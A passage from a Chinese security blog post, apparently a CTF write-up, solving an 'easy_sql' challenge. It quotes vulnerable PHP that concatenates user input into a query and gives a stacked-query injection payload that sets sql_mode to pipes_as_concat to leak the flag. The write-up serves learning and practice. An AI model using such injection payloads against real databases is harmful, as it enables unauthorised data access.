class="line">                while($row = mysqli_fetch_row($res))&#123;</span><br><span class="line">                    print_r($row);</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;while(@mysqli_next_result($MysqlLink));</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    ?&gt;</span><br></pre></td></tr></table></figure>
<p>主要的源码在这里</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(strlen($post[<span class="string">'query'</span>])&gt;<span class="number">40</span>)&#123;</span><br><span class="line">           <span class="keyword">die</span>(<span class="string">"Too long."</span>);</span><br><span class="line">       &#125;</span><br><span class="line">$sql = <span class="string">"select "</span>.$post[<span class="string">'query'</span>].<span class="string">"||flag from Flag"</span>;</span><br></pre></td></tr></table></figure>
<p>看样子应该是堆叠了，但是一直不知道 || 应该怎么用，后来看到这么一篇文章</p>
<p><a href="https://blog.csdn.net/lixora/article/details/60572357" target="_blank" rel="noopener">https://blog.csdn.net/lixora/article/details/60572357</a></p>
<p>首先设置sql_mode模式为pipes_as_concat，然后来拼接语句，本地实验了一下</p>
<p><img src="https://i.loli.net/2019/08/19/a675ZHfQ2nM1SOi.png" alt=""></p>
<p>自然的题目中对应的$post[‘query’]就是这个</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1;<span class="builtin-name">set</span> <span class="attribute">sql_mode</span>=pipes_as_concat;select 1</span><br></pre></td></tr></table></figure>
<p><img src="https://i.loli.net/2019/08/19/rTP7iIA3UYENfR9.png" alt=""></p>

      
    </div>
    
    
    

    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>坚持原创技术分享，您的支持将鼓励我继续创作！</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>Donate</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/images/wechatpay.jpg" alt="夜莫离、 WeChat Pay">
        <p>WeChat Pay</p>
      </div>
    

    
      <div id="alipay" style="display: inline-block">
        <img id="alipay_qr" src="/images/alipay.jpg" alt="夜莫离、 Alipay">
        <p>Alipay</p>
      </div>
    

    

  </div>
</div>

      </div>
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CTF/" rel="tag"># CTF</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/08/13/某cms5-5代码执行分析/" rel="next" title="某cms5-5代码执行分析">
                <i class="fa fa-chevron-left"></i> 某cms5-5代码执行分析
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/10/15/joomla3-4-6-rce分析/" rel="prev" title="joomla3.4.6-rce分析">
                joomla3.4.6-rce分析 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">夜莫离、</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">58</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">16</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/yemoli" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://chxing.xyz/" title="Bling_Dog" target="_blank">Bling_Dog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.smi1e.top/" title="Smi1e" target="_blank">Smi1e</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://altman.vip/" title="Altman" target="_blank">Altman</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.virtua1.cn/" title="Virtua1" target="_blank">Virtua1</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.zhaoj.in/" title="赵" target="_blank">赵</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.dongzt.cn/" title="Alkaid" target="_blank">Alkaid</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://cdusec.com/" title="CDUSEC" target="_blank">CDUSEC</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://cdusec.happyhacking.top/" title="CDUSEC内部博客" target="_blank">CDUSEC内部博客</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://jjhpkcr.xyz/" title="江江河畔砍柴人" target="_blank">江江河畔砍柴人</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.youknowi.xin/" title="图先生" target="_blank">图先生</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://a3ura.github.io/" title="a3ura" target="_blank">a3ura</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.recorday.cn/" title="C0d3r1iu" target="_blank">C0d3r1iu</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.iloveflag.com/" title="醉梦半醒" target="_blank">醉梦半醒</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#CheckIn"><span class="nav-number">1.</span> <span class="nav-text">CheckIn</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#EasyPHP"><span class="nav-number">2.</span> <span class="nav-text">EasyPHP</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Pythonginx"><span class="nav-number">3.</span> <span class="nav-text">Pythonginx</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#easy-sql"><span class="nav-number">4.</span> <span class="nav-text">easy_sql</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2018 &mdash; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">夜莫离、</span>

  
</div>


  <!-- <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div> 



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>-->



<div class="theme-info">
 <div class="powered-by"></div>
 <span class="post-count">博客全站共63.1k字</span>
</div>
        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

  
<script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>

<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/love.js"></script>
</body>
</html>
